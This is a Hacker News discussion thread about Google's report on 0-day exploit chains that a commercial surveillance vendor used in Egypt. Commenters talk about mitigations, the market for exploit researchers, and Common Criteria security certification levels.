[HN Gopher] 0-days exploited by commercial surveillance vendor i...
       ___________________________________________________________________
        
       0-days exploited by commercial surveillance vendor in Egypt
        
       Author : mikece
       Score  : 280 points
       Date   : 2023-09-22 17:21 UTC (5 hours ago)
        
 (HTM) web link (blog.google)
 (TXT) w3m dump (blog.google)
        
       | aborsy wrote:
       | I'm not an expert, but would't a VPN (commercial or to a server
       | with known exit IP) prevent such attacks? It will kick out the
       | MITM.
       | 
       | Also I wonder if the lock down mode could block it.
        
         | fullspectrumdev wrote:
         | Yes and also yes.
         | 
         | These attacks when launched by government entities pretty much
         | always rely on placing a box at the ISP that does the targeted
         | interception/MiTM against a subset of subscribers.
         | 
         | So using a VPN would ensure your traffic is tunnelled "beyond"
         | their reach.
         | 
         | Lockdown mode also would have prevented the iOS exploit chain,
         | apparently.
        
       | swordbeta wrote:
       | Is the commit containing the fix for the v8 bug 1473247
       | CVE-2023-4762 available anywhere?
        
       | mtu9001 wrote:
       | Some men just want to watch the world burn.
        
       | toasterblender wrote:
       | Here is what I do not understand:
       | 
       | Spyware firms and 0-day vendors both have staff dedicating to
       | finding 0-days. Why do Google and Apple not simply poach these
       | staff?
       | 
       | I am sure Google and Apple can offer very competitive salaries,
       | so why do they not do so? Is it because the cost of basically
       | poaching all of the skilled 0-day hunters is deemed to be greater
       | than the cost of just issuing patches?
        
         | OneLessThing wrote:
         | I am this person. I work as a researcher finding 0-days.
         | 
         | From the employee perspective: Wages are equal. Big Tech work
         | is less interesting (build big bug finding machines that find
         | have high quantity of bugs) and report the bugs that sit into
         | some bug tracker only to maybe be fixed in 3 months. Offensive
         | security work is more interesting. It requires intimate
         | knowledge of the systems you research, since you only need a
         | handful and the shallow ones get found by Big Tech. You must go
         | deep. Additionally offensive security requires the know-how to
         | go from vulnerability to code execution. Exploitation is not an
         | easy task. I can't explain why engineers work for companies
         | that I deem immoral, but that's probably because they don't
         | feel the same way as I do.
         | 
         | From the employer perspective: How much does the rate of X
         | vulnerabilities per year cost me? If our code has bugs but is
         | still considered the securest code on the market, it may not
         | benefit the company to increase the security budget. If the
         | company expands the security budget then which division is
         | getting cut because of it, and what is the net result to the
         | company health?
         | 
         | If you want to fix the vulnerabilities you need to make the
         | price of finding and exploiting them higher than the people
         | buying them can afford. And you must keep the price higher as
         | advances in offensive security work to lower the price of
         | finding and exploiting them. Since defensive companies don't
         | primarily make money from preventing bugs and offensive
         | companies do primarily make money by finding bugs, there is a
         | mismatch. The ultimate vulnerability in a company, or any
         | entity, is finite resources.
        
         | rehitman wrote:
         | There is also a chance at play here. Many people are trying to
         | find a hole, some are more lucky than the other. Google has a
         | great team, so they get lucky more, that is why these things
         | are not too common, but at some point a bad guy gets lucky too,
         | even though he is not the smartest in the room.
        
         | jklinger410 wrote:
         | They probably don't want to hire criminals to work at their
         | companies.
        
           | ziftface wrote:
           | Already very well-paid criminals for that matter
        
           | [deleted]
        
         | callalex wrote:
         | Because that would eat into profit margins, and at the end of
         | the day very very few paying customers actually make their
         | purchasing decisions based on security. On top of that almost
         | nobody is really knowledgeable enough to make an informed
         | decision in the first place. So the money doesn't get spent.
        
         | tetrep wrote:
         | I think this is similar to looking at the budget of the US
         | government and asking why they don't simply pay off all the
         | potential criminals such that most crime in the US is then
         | mitigated.
        
           | callalex wrote:
           | That's not equivalent at all. Paying off criminals creates an
           | incentive for there to be more criminals. Paying more
           | security researchers does not incentivize people writing
           | buggy C code to write even buggier C code.
        
         | crtified wrote:
         | It's a good idea, but in some ways, akin to the challenge that
         | would be presented by attempting a similar-veined " _why doesn
         | 't the world's richest country just hire all the world's best
         | military generals, leaving zero for any other country?_".
         | 
         | The reasons why it's not possible are myriad, but boil down to
         | the fact that the world and humanity are very big things, and
         | one entity can't possibly get them all, or even most of them.
         | There's too much diverse heterogenuity built into everything.
         | Including many worldviews and loyalties that go beyond money.
        
         | entuno wrote:
         | Some of them wouldn't want to work for Google and Apple in the
         | first place, regardless of the salary.
         | 
         | But while they could try and poach them today, tomorrow there
         | will be a whole load of new people working for those companies,
         | and it'll just be a never-ending cycle.
        
           | cco wrote:
           | > Some of them wouldn't want to work for Google and Apple in
           | the first place, regardless of the salary.
           | 
           | For moral reasons do you mean? I would be surprised to learn
           | there are a lot of people that are open to selling 0 day
           | exploits to "bad actors" (granted that this term is doing a
           | lot of heavy lifting here), but wouldn't want to work for
           | Google or Apple.
           | 
           | > ...it'll just be a never-ending cycle
           | 
           | I think the idea is you pay them so well that they can work
           | for a handful of years and remove any cash incentive reason
           | for them to continue selling 0 days to bad actors.
        
             | eastbound wrote:
             | > "bad actors", but wouldn't want to work for Google or
             | Apple
             | 
             | - Everyone who doesn't like US hegemony. Which happens
             | about everywhere but US, in varied proportion, but even in
             | Europe, and even worse in Middle-East,
             | 
             | - Everyone who doesn't like monopolies. Capitalism of
             | competition (as opposed to state capitalism, when the state
             | borrows a trillion per semester, ahem) requires that
             | monopolies be broken down to avoid distortion of
             | competition. Helping bad actors can be, under their
             | viewpoint, less bad than the damage done to a billion
             | consumers consumers at a time. Plus monopolies impose a
             | monoculture of occidentalism, with certain values that a
             | firm in Egypt might consider worse than sponsoring bad
             | actors.
        
               | toasterblender wrote:
               | If the number of skilled 0-day hunters who will work for
               | a paycheck is > 0, then yours is a moot point, since a
               | poaching program would still make an impact even if there
               | are some people who work for spyware companies who would
               | not work for FAANG.
               | 
               | I think you will also find that morals for many people
               | are inversely proportional to the offered salary. An
               | 0-day developer being compensated $130k may well abandon
               | their particular morals if offered a $240k salary
               | instead.
        
           | toasterblender wrote:
           | > But while they could try and poach them today, tomorrow
           | there will be a whole load of new people working for those
           | companies, and it'll just be a never-ending cycle.
           | 
           | The number of people who successfully find 0-click 0-days for
           | iOS/Android is very small. It's not a vastly replenishable
           | resource.
        
             | hattmall wrote:
             | It's a small group but a wide pool. It's not like the same
             | person finds 10 0days. And until they do find their one
             | exploit most of them have pretty much no credentials at
             | all. So how do you avoid hiring 10,000 up and comers that
             | never actually come up?
        
               | toasterblender wrote:
               | The same that it works in any other industry. By hiring
               | those with proven track records, the best of the best.
               | The goal is obviously not to hire 100% of the potential
               | 0-day hunters, but by launching a concentrated poaching
               | effort, to make a sufficient dent.
        
               | throwaway38475 wrote:
               | People have said Apple can buy companies like NSO for
               | less than they probably spend on SEIMs in a year. But as
               | soon as they do that there will be another startup doing
               | the same thing.
               | 
               | The company (GreyShift) that broke the secure enclave had
               | ex-apple security engineers working for them.
        
               | entuno wrote:
               | They could certainly go out and try and hire some of the
               | best iOS vuln researches. But if they hire the top 10 out
               | there, then #11 gets a massive payrise to go and work for
               | one of the spyware companies.
               | 
               | And if Apple is paying huge amounts of money and getting
               | into bidding wars with all the other companies out there
               | for vuln researches, that'll attract a load more people
               | to start hunting.
        
         | jrvarela56 wrote:
         | Isn't this akin to asking why Google and Apple end up acquiring
         | companies at very high prices if they could just hire the
         | founders and have them build the products in-house?
        
           | toasterblender wrote:
           | Poaching founders is an entirely different kettle of fish
           | than just poaching line employees.
        
             | jrvarela56 wrote:
             | Oh, I thought finding these vulns was a highly open-ended
             | endeavor with variable payouts.
        
               | fullspectrumdev wrote:
               | It depends. Some companies that buy exploits have public
               | "price lists" for acquisitions.
               | 
               | 100k+ for a Safari on iOS code exec, another 200k for the
               | Safari sandbox escape, then another 500k+ for the kernel
               | exploit?
               | 
               | A full chain is real money. Especially when they resell
               | this ability for 1-2M+ per user.
        
           | toxik wrote:
           | Google absolutely "poach" promising startup devs tbh.
        
         | alephnerd wrote:
         | > Why do Google and Apple not simply poach these staff
         | 
         | They do. Plenty of white hat teams hire 8200 vets, but
         | sometimes they'd rather make their own company instead of being
         | a cog within an amaphorous foreign corporation.
        
           | FirmwareBurner wrote:
           | This. IIRC some famous security researcher responsible for
           | iOS jail-breaks was poached by Apple only to leave after 3
           | months.
           | 
           | Successful and skilled security people with a proven track
           | record, don't have the paciente of putting up with the
           | charade such large orgs require.
        
             | reqo wrote:
             | George Hotz
        
         | icelancer wrote:
         | Money is just one input for why people choose to work at
         | certain places.
        
         | kramerger wrote:
         | Google has one of the best teams money and prestige can buy:
         | 
         | https://en.m.wikipedia.org/wiki/Project_Zero
         | 
         | They also have excellent collaboration with independent
         | researchers across the world. But given how much software is
         | written everyday, they can still miss some issues.
        
           | toasterblender wrote:
           | Project Zero is amazing, but they 1) seem like a very small
           | team, and 2) their mandate is far too broad (essentially to
           | search for 0-days in anything, versus a specific system).
           | What I am talking about is more like Apple having a dedicated
           | team of 10 vulnerability researchers all looking into iOS
           | 0-days fulltime.
        
             | throwaway38475 wrote:
             | They all do that. I've been in Offensive Security for 10+
             | years with several spent at FAANGS, and not only do they
             | all have large security teams doing internal testing, they
             | hire multiple contractors like Trail-of-Bits to audit every
             | important service continuously throughout the year.
             | 
             | Apple has way more than 10 full time researchers looking at
             | iOS all day, trust me :). They also have a really generous
             | bug bounty. There is always bugs though.
        
               | kramerger wrote:
               | > Apple has way more than 10 full time researchers
               | looking at iOS all day.
               | 
               | Yes
               | 
               | > They also have a really generous bug bounty.
               | 
               | Hell no
        
               | tholdem wrote:
               | Agree. Not long ago, Apple used to sue people reporting
               | vulnerabilities to them. Imagine punishing people doing
               | free work for you. Not a good look.
        
               | 77pt77 wrote:
               | Getting punished is the default.
               | 
               | If you refer come across anything, keep your mouth shut.
        
               | lima wrote:
               | Not only is it not generous (relatively speaking), but
               | actually getting paid can be extremely annoying.
               | 
               | Used to be even worse.
        
         | toxik wrote:
         | I think it's many factors.
         | 
         | 1. They do to some extent.
         | 
         | 2. Which researchers are you going to hire? Lemon market,
         | whoever wants to be hired is more likely a lemon.
         | 
         | 3. Freelancing grayhat stuff is very rock n roll.
         | 
         | 4. I bet some they try to hire and then the square and
         | inflexible large corpo hiring process is just absolutely unfit
         | for hiring such a person.
        
           | fullspectrumdev wrote:
           | > Which researchers are you going to hire? Lemon market,
           | whoever wants to be hired is more likely a lemon.
           | 
           | Not really. Most people in that space who have a "day job"
           | are almost always open to being hired for better
           | TC/benefits/more interesting problems.
           | 
           | Points 3 & 4 are largely correct.
           | 
           | It's very rock and roll, but a very unstable income and most
           | of the brokerages are comically untrustworthy. Also you may
           | develop a conscience and find it hard to sleep at night.
           | 
           | Point 4... usually the people who can find such bugs reliably
           | don't work well in large corps past the short term. The
           | unexplained gaps in a CV also aren't conducive to getting
           | past HR easily.
        
         | tagawa wrote:
         | It's not just money that motivates.
        
         | saagarjha wrote:
         | Poach them to do what? There's not much use to Apple or Google
         | to have an implant developer around, and just having them do
         | nothing is likely to be frustrating if the corporate lifestyle
         | wasn't enough already.
        
           | toasterblender wrote:
           | > Poach them to do what?
           | 
           | Poach them to discover 0-days in their software, as I said.
        
             | saagarjha wrote:
             | That's not what implant developers do.
        
         | permo-w wrote:
         | who's to say they're not doing this? there are a lot of
         | security companies and researchers in the world though
         | 
         | or alternatively: as lovely as the hacker -> employee fairytale
         | sounds, a certain % of the "I would never work for
         | Google/Apple" types would come in with the sole purpose of
         | installing backdoors from the inside
        
           | fullspectrumdev wrote:
           | A lot of the really good hackers won't pass HR screening, or
           | be able to cope with corporate bullshit beyond a year.
           | 
           | So there's also that.
        
         | trollian wrote:
         | These exploits are weapons. Look at what governments pay for
         | weapons. That's hard to compete with.
        
       | boothemoo wrote:
       | This vulnerability was most probably used by the Egyptian
       | authorities to hack the mobile phone of the presidential
       | candidate Ahmed El Tantawy who is competing with the current
       | president Abdel Fatah El Sisi over presidency.
       | 
       | https://x.com/jsrailton/status/1705271600868692416?s=46&t=Kq...
        
       | mrwnmonm wrote:
       | [dead]
        
       | Veserv wrote:
       | Just your regular reminder that for the only security
       | certification that Apple advertises on their website for iOS
       | [1][2] Apple only achieved the lowest possible level of security
       | assurance, EAL1. A level only fit for products where [3]: "some
       | confidence in the correct operation is required, but the threats
       | to security are not viewed as serious" which does not even
       | require "demonstrating resistance to penetration attackers with a
       | basic attack potential" [4]. This is four entire levels lower
       | than "demonstrating resistance to penetration attackers with a
       | moderate attack potential" [5].
       | 
       | Apple has never once, over multiple decades of failed attempts,
       | demonstrated "resistance to penetration attackers with a moderate
       | attack potential" for any of their products. To be fair, neither
       | has Microsoft, Google, Amazon, Cisco, Crowdstrike, etc. It should
       | be no surprise that the companies, processes, and people who lack
       | the ability, knowledge, and experience to make systems resistant
       | to moderate attackers despite nearly unlimited resources are
       | regularly defeated by moderate attacks like commercial
       | surveillance companies. They certify that they absolutely, 100%
       | can not.
       | 
       | [1] https://support.apple.com/guide/certifications/ios-
       | security-...
       | 
       | [2]
       | https://support.apple.com/library/APPLE/APPLECARE_ALLGEOS/CE...
       | 
       | [3]
       | https://www.commoncriteriaportal.org/files/ccfiles/CC2022PAR...
       | Page 14
       | 
       | [4]
       | https://www.commoncriteriaportal.org/files/ccfiles/CC2022PAR...
       | Page 16
       | 
       | [5]
       | https://www.commoncriteriaportal.org/files/ccfiles/CC2022PAR...
       | Page 20
        
         | kramerger wrote:
         | Isn't EAL1 what you get for just showing up?
         | 
         | Basically, here is the product. Here are some design documents.
         | We don't have anything more. Can we get our EAL1 please?
        
           | Veserv wrote:
           | Yup. Want to have a laugh? Here is the Apple iOS
           | certification report [1].
           | 
           | On PDF page 26 (document page 21) they describe the rigorous
           | AVA_VAN.1 vulnerability analysis certification process they
           | faced. The evaluation team basically typed in: "ios
           | vulnerabilities" into Google and then typed in "ios iphone"
           | into the NVD and verified that all of the search results were
           | fixed. AVA_VAN.1 certification please.
           | 
           | To explain why, AVA_VAN.1 does not require a independent
           | security analysis, it only requires a survey of the public
           | domain for known vulnerabilities [2]. You need AVA_VAN.2
           | (which is only required in EAL2 and EAL3) before they
           | actually attempt to look at for vulnerabilities themselves.
           | 
           | [1] https://www.commoncriteriaportal.org/files/epfiles/st_vid
           | 112...
           | 
           | [2] https://www.commoncriteriaportal.org/files/ccfiles/CC2022
           | PAR... Page 154
        
         | wepple wrote:
         | There is a near zero chance that being EAL4 or higher certified
         | would've prevented these attacks.
         | 
         | CC might be better than PCI-DSS, but not by much.
        
         | [deleted]
        
         | manuelabeledo wrote:
         | > Apple has never once, over multiple decades of failed
         | attempts, demonstrated "resistance to penetration attackers
         | with a moderate attack potential" for any of their products. To
         | be fair, neither has Microsoft, Google, Amazon, Cisco,
         | Crowdstrike, etc.
         | 
         | So, OK I guess?
         | 
         | It's worth noting that CC evaluation does not score the actual
         | practical security of a device or system, but the level of
         | testing it was submitted to, which is consistent with pretty
         | much every single governmental certification out there.
        
           | Veserv wrote:
           | Sure it does, it is just that EAL4+, the highest level any of
           | them can reach, does not certify "resistance to penetration
           | attackers with a moderate attack potential". Guess what,
           | commercial hackers have "moderate attack potential".
           | 
           | You are complaining that the 40 cm high jump test does not
           | score actual jumping ability. You are right, it is a low bar
           | that they should all be able to pass. You can not use the 40
           | cm high jump test to distinguish them. What you need to do is
           | use the 100 cm high jump test. Some can pass it, but none of
           | the large commercial vendors can. Sure, it would be nice if
           | we had more gradations like the 60 cm and 80 cm tests, but we
           | do not really know how to do that, so the best we can do is
           | the 100 cm test.
        
             | manuelabeledo wrote:
             | I'm not really complaining, though. I'm just saying that
             | security certifications are more about compliance than
             | actual proof that a system cannot be easily compromised. In
             | other words, they are more about legal requirements than
             | guarantees.
             | 
             | It is also misleading to assert that a device or a system
             | are _less_ secure because they haven 't been certified.
             | Vendors submit requests to validate _against specific
             | levels or certifications_ , and it is not the goal of the
             | certification authority to determine "how high" they score.
        
               | Veserv wrote:
               | They _can not_ certify against useful assurance levels.
               | They have tried repeatedly for decades and spent huge
               | gobs of money. It is not a choice, they are incapable of
               | it.
               | 
               | I am judging them by their maximum ability ever
               | demonstrated under the most favorable circumstances and
               | they still can certify resistance against moderate
               | attackers. They have never developed systems that can
               | protect against the prevailing threat landscape and they
               | can not develop such systems. Their best is not good
               | enough.
        
         | vuln wrote:
         | Do you by any chance have this data on Google, Samsung, Huawei,
         | LG, and other cell phone manufacturers? I've never looked into
         | these certifications and I wouldn't know where to start
         | looking. Do the above companies publish the results like Apple?
        
           | Veserv wrote:
           | Sure. The Common Criteria for Information Technology Security
           | Evaluation [1] is the foremost internationally recognized
           | standard (ISO 15408) for software security that most large
           | companies certify against for at least some of their product
           | portfolio. I believe there are US government procurement
           | requirements to that effect, so many systems will have
           | certifications of some form.
           | 
           | For many companies you just search: "{Product} Common
           | Criteria" and they will usually have a page for it on their
           | website somewhere.
           | 
           | You can also go directly to the certified products page:
           | https://www.commoncriteriaportal.org/products/
           | 
           | For smartphones you can see them there under "Mobility".
           | 
           | Unfortunately, it is fairly hard to parse if you are not
           | familiar with the terminology. The general structure of
           | Common Criteria certifications is Security Functional
           | Requirements (SFR) which are basically the specification of
           | what the product is supposed to do and the Security Assurance
           | Requirements (SAR) which are basically how you certify the
           | SFRs are met (and what level of assurance you can have that
           | the SFRs are met). SARs can be bundled into Evaluation
           | Assurance Levels (EAL) which define collections that
           | reasonably map to levels of confidence. You can add SARs
           | beyond the current EAL which is how you get a EAL level with
           | a +, but it is important to keep in mind that just cherry
           | picking certain SARs does not necessarily give you a holistic
           | assurance improvement.
           | 
           | SARs and SFRs can be further pre-bundled into Protection
           | Profiles (PP) which basically exist to provide pre-defined
           | requirements and testing methodologies instead of doing it
           | one-off every time. Some Protection Profiles support variable
           | EAL/SAR levels, but these days people generally just certify
           | against a Protection Profile with a fixed SAR bundle. This is
           | what PP Compliant means. If you want to see what they
           | certified against, you would need to look at the Protection
           | Profile itself.
           | 
           | For smartphones, the standard Protection Profile for the
           | phone itself is Mobile Device Fundamentals. If you look at
           | the SAR bundle there you will see that they correspond to
           | EAL1 + a small number of EAL2, resulting in a overall level
           | of EAL1+. As they are in-between EAL1 and EAL2 I just
           | classified it as EAL1 for my earlier post. If you peruse
           | further you will see that basically every Protection Profile
           | that companies certify to as PP Compliant are basically the
           | same EAL1+ or thereabouts. So, if you see PP Compliant, it
           | probably means EAL1+ or so.
           | 
           | Hope that helps.
           | 
           | [1] https://www.commoncriteriaportal.org/cc/
        
           | selectodude wrote:
           | https://www.commoncriteriaportal.org/products/index.cfm?
           | 
           | Generally only components are EAL certified. For example, the
           | iPhone is not on there, but the security protecting access to
           | Apple Pay on the iPhone 13 with A15 Bionic running iOS 15.4.1
           | (19E258) is EAL2+.
        
           | alephnerd wrote:
           | You as a private consumer wouldn't be able to buy one of
           | these EAL4+ products without a relationship with a defense
           | and security oriented reseller.
        
         | alephnerd wrote:
         | > neither has Microsoft, Google, Amazon, Cisco, Crowdstrike,
         | etc. It should be no surprise that the companies, processes,
         | and people who lack the ability, knowledge, and experience to
         | make systems resistant to moderate attackers
         | 
         | Companies create a separate SKU for products that meet higher
         | levels of security assurance for Common Criteria. I know for a
         | fact that the companies you listed offer SKUs that meet higher
         | EA levels (EAL4+) for Common Criteria. You just gotta pay more
         | and purchase via the relevant Systems Integrators.
         | 
         | A consumer product line like the Apple iPhone isn't targeting
         | DoD buyers. That's always been Blackberry Ltd's bread and
         | butter
        
           | Veserv wrote:
           | I said, "resistance to penetration attackers with a moderate
           | attack potential". EAL5 is the first level at which you must
           | demonstrate that as can be seen in my 5th link [1] which
           | bolds the diffs from the previous level.
           | 
           | None of those companies has ever once certified a product to
           | that level as far as I am aware. The failure is so complete
           | that it is generally viewed as impossible to fix the
           | structural defects in products that failed a EAL5
           | certification without a total rewrite. It used to say that in
           | the standard somewhere, but the standard revisions have moved
           | it so I can not quote it directly.
           | 
           | [1] https://www.commoncriteriaportal.org/files/ccfiles/CC2022
           | PAR... Page 20
        
             | alephnerd wrote:
             | Going EAL5 and above doesn't make sense from a cost to
             | security ratio UNLESS the customer is open to paying more
             | for that level of verification.
             | 
             | Certain agencies and bureaus within the DoD do ask for this
             | and pay for it, but most are good enough with EAL4.
             | 
             | Most attacks can be resolved by following the bare minimum
             | recommendations of the MITRE ATTACK framework (marketing
             | buzzwords aside).
             | 
             | Least Priviliged Access, Entitelement Management, Identity
             | Enforcement, etc are all much easier wins and concepts that
             | haven't been tackled yet.
             | 
             | Companies will provide EAL5+ if the opportunity is large
             | enough, but it won't be publicized. Iykyk. If not, chat
             | with your SI.
        
               | Veserv wrote:
               | No. The US government briefly had procurement
               | requirements for high security deployments.
               | 
               | They were forced to relax them because Microsoft could
               | not make bids that met the minimum requirements for DoD
               | and high security projects and that made their Senators
               | mad. They relaxed them to EAL4+ because that was the most
               | that Microsoft could do.
               | 
               | They since relaxed them further to EAL2 because that is
               | all the most large AV and cybersecurity appliance vendors
               | could achieve. They justified it under the "swiss cheese"
               | model where if you stack multiple EAL2 then you get EAL4
               | overall, which is insane. The government has since
               | relaxed them even further since none of the companies
               | want to do any certification since none of them can
               | achieve a decisive edge over the others that they can
               | write into the requirements thus disqualifying their
               | competition, so certification is just a zero-sum game.
        
               | kramerger wrote:
               | EAL5 is mainly about having a semi- formal description
               | and for 6-7 you also need formal verification.
               | 
               | Outside some very limited cases, we don't have the tools
               | to go there yet. EAL4+ is what people should aim for.
        
               | Veserv wrote:
               | EAL4+ is useless against the prevailing threat actors as
               | can be seen time and time again. There is no point at
               | aiming for inadequate; even if you get there you still
               | get nothing.
               | 
               | EAL6-7 certifications are basically the only known,
               | existing certifications that have any evidence supporting
               | that they are adequate to defend against the known and
               | expected threats. As far as I am aware, there are no
               | other certifications even able to distinguish products
               | that can viably protect against organized crime and
               | commercial spyware companies. Existing products max out
               | every other certification and we know for a fact those
               | products are ineffective against these threat actors.
               | Therefore, we can conclude that those certifications are
               | useless for identifying actual high security products
               | adequate for the prevailing threat landscape.
               | 
               | Sure, if we had some other certification that could
               | certify at that level and was more direct, that would be
               | nice. But we do not, the only ones that we know to work
               | and that products have been certified against are Common
               | Criteria EAL6-7 (and maybe EAL5). We can either choose
               | certifications that are cheap and do not work, or ones
               | that work. Then, from the ones that work, we can maybe
               | relax the requirements carefully to identify useful
               | intermediate levels, or identify if some of the
               | requirements are excessive and unnecessary for achieving
               | the desired level of assurance.
               | 
               | However, the key takeaway from this is not whether we can
               | certify products to EAL5 and higher or whether those
               | certifications work or the cost-benefit of that
               | certification process. The key takeaway is that EAL4 is
               | certainly inadequate. Any product in commercial use
               | targeting that level or lower is doomed to be useless
               | against the threat actors who we know will attack it.
        
               | insanitybit wrote:
               | I feel like you're arguing that these certifications are
               | useless and uncorrelated with security but then you're
               | trying to say that Apple and others are bad for not
               | having them.
        
               | Veserv wrote:
               | Low certification levels certify low levels of security.
               | High certification levels certify high levels of
               | security.
               | 
               | EAL4 is known to be too low against modern threats that
               | will attack commercial users. We know this from
               | experience where EAL4 systems are routinely defeated.
               | Higher certification levels, such as the SKPP at EAL6/7,
               | are known to be able to resist against much harder
               | threats such as state actors like the NSA (defeating a
               | NSA penetration test was a explicit requirement tested in
               | the SKPP by the NSA themselves).
               | 
               | Low certification levels, like EAL4 and lower, that are
               | the limit of the abilities of companies such as Apple and
               | Microsoft are known to be useless against commercial
               | threats. They are uncorrelated with protection against
               | commercial threats because they are inadequate in much
               | the same way that having a piece of paper in front of you
               | is uncorrelated with surviving a gunshot. Systems that
               | can only be certified to EAL4 and lower are certifiably
               | useless.
        
               | insanitybit wrote:
               | > Low certification levels certify low levels of
               | security. High certification levels certify high levels
               | of security.
               | 
               | I guess I don't know enough to say but I just doubt that,
               | knowing what I know about other certifications. I expect
               | that they're perhaps lightly correlated with security.
        
               | kramerger wrote:
               | > EAL4+ is useless against the prevailing threat actors
               | 
               | Hold on a second. Assurance level is about, well, level
               | of assurance the developers can provide. It is in most
               | cases just paperwork.
               | 
               | CC has a different mechanism to define attacker
               | capability & resources (cant recall what it's called) and
               | set the security goals accordingly
        
               | Veserv wrote:
               | The AVA_VAN (vulnerability analysis) Security Assurance
               | Requirement (SAR). AVA_VAN.4 requires "resistance to
               | penetration attackers with a moderate attack potential".
               | AVA_VAN.4 is only required for EAL5 and higher.
               | 
               | You could individually incorporate a higher AVA_VAN into
               | a lower EAL as a augmentation, but few do that. You also
               | do not get any of the other conformance assurances that a
               | higher EAL gives you. There is a reason we use EAL as a
               | whole instead of just quoting the AVA_VAN at each other.
               | 
               | Though maybe you are talking about the Security
               | Functional Requirements (SFR) which define the security
               | properties of your system? That is somewhat orthogonal.
               | You have properties and assurance you conform to the
               | properties. Conformance more closely maps to "level of
               | security" as seen in the AVA_VAN SAR. However, the
               | properties are just as important for the usage of the
               | final product because you might be proving you absolutely
               | certainly do nothing useful.
        
         | dang wrote:
         | Please don't post "regular reminder" style comments - they're
         | too generic, and generic discussion is consistently less
         | interesting. Good threads require being unpredictable. The best
         | way to get that is to respond to specific new information in an
         | article.
         | 
         | https://news.ycombinator.com/newsguidelines.html
        
         | insanitybit wrote:
         | I mean, it occurs to me that maybe _all of these companies_
         | aren 't doing this for a reason - because common criteria and
         | compliance are often stupid and don't represent real security.
         | Perhaps these policies are the exception? But I've managed SOC2
         | for example and I can definitely say that there are plenty of
         | ways to get your SOC2 without giving a shit about actual
         | security.
        
           | Veserv wrote:
           | They failed. Repeatedly. For decades. They spent billions
           | trying. The failed so much that the standard writers
           | determined the only logical conclusion is that it must be
           | practically impossible to retrofit a system that failed EAL5
           | certification to achieve EAL5 or higher certification without
           | a complete rewrite and redesign. It says so right there in
           | the standard [1]: "EAL4 is the highest level at which it is
           | likely to be economically feasible to retrofit to an existing
           | product line". That was added due to the decades of
           | experience where everybody who ever tried to do that failed
           | no matter how much time or money they spent.
           | 
           | We also have plenty of evidence that it does matter, they
           | just can not do it. Here is Google touting their Common
           | Criteria certification for the Titan M2 security chip
           | hardware which is EAL4 + AVA_VAN.5 (resistance against
           | penetration attackers with a high attack potential) [2]. Note
           | that this is only the hardware (software was not certified; a
           | critical severity vulnerability was actually disclosed in the
           | software allowing complete takeover if I remember correctly)
           | and only cherry picks AVA_VAN.5 so is still only EAL4, not a
           | holistic EAL6 certification. Getting that certification was a
           | deliberate effort and cost. If they literally did not care
           | about the Common Criteria then they would just certify to the
           | checkbox level like everybody else. It is because they could
           | certify it to a higher level than most other can achieve that
           | they chose to do it because then they could tout their unique
           | advantage.
           | 
           | Basically everybody gets a certification and basically
           | everybody displays their certification on their page. There
           | is something to be said about them opting for a EAL1 over a
           | EAL4. It is basically assumed that any serious vendor could
           | probably get a EAL4 with some effort. So, there is no
           | differential advantage to displaying a EAL4 since everybody
           | could get it. It is just a zero-sum game to pay for
           | certification if everybody knows nobody has a true advantage.
           | However, if you can achieve EAL5 or higher, then you do have
           | a unique advantage because basically nobody else can do it.
           | The fact that none of the major vendors attempts EAL5, shows
           | that they can not do it.
           | 
           | [1] https://www.commoncriteriaportal.org/files/ccfiles/CC2022
           | PAR... Page 18
           | 
           | [2] https://security.googleblog.com/2022/10/google-
           | pixel-7-and-p...
        
       | account-5 wrote:
       | I've a question. This 0-day is a 0-click that didn't require any
       | document download or anything. Simply visiting a http site would
       | do it. What if you have JavaScript disabled be default. Would
       | this exploit still work?
        
         | bananapub wrote:
         | it's http interception so no, I doubt javascript matters at all
        
           | lucb1e wrote:
           | Without knowing more, that's a bit of an assumption. The
           | vulnerability could be in image decoding, in which case an
           | <img> tag is enough and no scripting is needed, but it could
           | also very well require doing something funky with JavaScript.
        
       | bingobongodude wrote:
       | I am pretty sure I was hit with this. I had some REALLY weird
       | redirects coming from text msgs. NOT from Egypt. Maybe paranoid.
       | Offline / on new Linux devices for now.
        
         | [deleted]
        
       | Macha wrote:
       | It's good to get some more info, but it is a little disconcerting
       | that they only mention patching Chrome. What was the sandbox
       | escape on Android? Even if you had code execution inside the
       | Chrome process on Android, that shouldn't be enough to enable
       | persistence, so clearly there's another vulnerability.
       | 
       | Also in this case the attack vector was MITM of http and one time
       | links as it was a targeted campaign, but it feels there's nothing
       | preventing someone putting this in an ad campaign or
       | sms/discord/matrix/whatever spam and spraying it everywhere to
       | build a botnet or steal user credentials or whatever.
        
         | fullspectrumdev wrote:
         | They state that they were unable to capture the follow-on
         | stages of the Android chain, they only got the initial
         | execution component.
         | 
         | Which means there's missing a sandbox escape and privilege
         | elevation bug.
         | 
         | Also yes while delivery here was apparently ISP level MiTM
         | using lawful intercept capabilities, there's no reason the
         | exploit couldn't be delivered as a 1click via a phishing link.
        
         | toasterblender wrote:
         | > What was the sandbox escape on Android? Even if you had code
         | execution inside the Chrome process on Android, that shouldn't
         | be enough to enable persistence, so clearly there's another
         | vulnerability.
         | 
         | This is such a crucial point. Forced to read between the lines
         | of the blog post (because the above information is missing), it
         | sounds like there are currently unpatched issues in Android
         | revolving around this?
        
           | fredgrott wrote:
           | Read it again, no sandbox attack on Android MITM and one time
           | link attack only .
        
           | fullspectrumdev wrote:
           | Likely yes, they were unable to capture the following stages
           | so they don't know what was exploited after gaining initial
           | execution within the chrome sandbox.
           | 
           | Likely there's a chrome sandbox escape and a kernel exploit
           | remaining "unknown and unpatched".
        
             | vdfs wrote:
             | > Likely there's a chrome sandbox escape and a kernel
             | exploit remaining "unknown and unpatched".
             | 
             | There is certainly many of those that we don't know about,
             | if this was done in Egypt, imagine what a 3 letters agency
             | have
        
         | kramerger wrote:
         | The article is mainly about the iphone exploit chain: Safari
         | exploit -> PAC bypass -> kernel exploit.
         | 
         | Android version was pretty similar but I think needed two more
         | exploits to bypass Linux kernel mitigations.
         | 
         | PZ has a good technical writeup.
        
           | Macha wrote:
           | The only Project Zero write up recently about android sandbox
           | escapes appears to be on a different, ALSA based and Samsung
           | specific vulnerability.
        
           | 3abiton wrote:
           | Who is PZ?
        
             | popey456963 wrote:
             | Google's Project Zero.
        
         | waihtis wrote:
         | Im not well versed in mobile environments. Presumedly breaking
         | out of the Chrome sandbox would land you within the underlying
         | OS. Can you not build persistence there without abusing further
         | vulns?
        
           | Macha wrote:
           | There's nested sandboxes for browsers in mobile environments.
           | There's the inner layer which the web content is running in,
